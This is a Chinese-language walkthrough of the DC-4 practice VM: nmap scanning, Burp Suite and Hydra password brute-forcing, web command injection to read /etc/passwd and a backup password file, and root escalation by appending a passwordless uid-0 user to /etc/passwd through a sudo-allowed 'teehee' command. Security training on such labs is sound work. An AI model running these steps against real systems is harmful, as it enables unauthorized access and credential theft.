文章目录
一:环境准备
下载:点我
下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1
需要抓包软件bp,文件的下载安装可以参考我的 前面的内容 :047 Burp Suite的详细安装与使用
打开DC-4,建议把虚拟机升级到15.5.7,我之前的虚拟机做这个dc靶机实验的时候经常电脑蓝屏。


二:nmap扫描
扫描主机
cd /root/tmp/DC-4
nmap -sP 192.168.100.0/24 -oN nmap.sP

扫描端口号
nmap -A 192.168.100.3 -p 1-65535 -oN nmap.A
发现开放了22和80端口

浏览器访问

三:burpsuite
由页面中,admin information systems login我们猜测账号可能是admin
所以,我们先假设账号就是admin,用burpsuite进行暴力破解。
尝试用Kali上的bp,发现是普通版的,线程数只能选1,速度超级慢。。。

所以接下来需要另一台虚拟机win10,用的是专业版的bp。
win10 IP:192.168.100.6
进行bp抓包

选中内容,发送到intruder模块,然后释放包(再点击一次拦截请求)。

只对密码添加

接下来就是载入字典表。这个字典表怎么来的呢?

字典表路径如下图,把这文件转存到win10上。

设置线程数500,开始攻击

得到密码是:happy

浏览器登录成功

点击command进入,发现可以执行命令

bp抓包,然后发送到repeater模块。

其中的+号就是代表空格
既然可以输入指令,那我们输入whoami看看。。

然后输入cat /etc/passwd 发现三个用户。

都在home路径下,查看各个用户,发下在charles用户下有个有用的文件。
ls -al /home/jim 有个backups的文件夹。
ls -al /home/jim/backups 有个old-passwords.bak的文件
cat /home/jim/backups/old-passwords.bak

四:hydra爆破密码与ssh登录
复制old-passwords.bak的内容到Kali中,创建一个old-passwords.bak文件

同样再创建一个user.dic文件

hydra -L user.dic -P old-passwords.bak ssh://192.168.100.3 -vV -o hydra.ssh

爆破完成之后,得到jim的账号密码,

cat mbox

从cat mbox的内容来看,是root给jim发了一封邮件。
所以:
cd /var/mail
cat jim

得到charles的密码
ssh登录charles
ssh charles@192.168.100.3

五:提权
命令:sudo -l

告诉我们这个命令不需要root密码。
那么这个teehee到底是什么呢? 查看帮助文档。

-a的大概意思就是,追加到给定的文件,不要覆盖。

由上图可知,把hello写入到了test.txt中。
那么我们是不是可以用echo语句追加写入内容,如下图

那么怎么利用这个teehee命令进行提权呢?
我们知道,在linux中一切皆文件,也就是说所有的内容都是以文件的形式存在的。
那么 /etc/passwd 中记录的内容也是以文件的形式存在的。
那么如果在这文件后面追加用户名和密码等内容,是不是就相当于创建了用户。
接下来就先打开passwd这个文件看看,到底是啥样的。
cat /etc/passwd

这里的文件有特定的格式。
用户名:是否有密码保护:uid:gid:全称:家目录:/bin/bash
所以:
echo "q_q::0:0::/home/qq:/bin/bash" | sudo teehee -a /etc/passwd

没有sudo为什么会被拒绝呢?这是因为(root) NOPASSWD: /usr/bin/teehee 这句话的意思是,让teehee这条命令获取管理员权限不需要管理员密码,而不是这条命令具有管理员权限。
这样我们就创建q_q用户成功。
我们Kali新建一个窗口进行登录,发现不行

我们回到刚才的窗口,用su命令,进行用户切换。











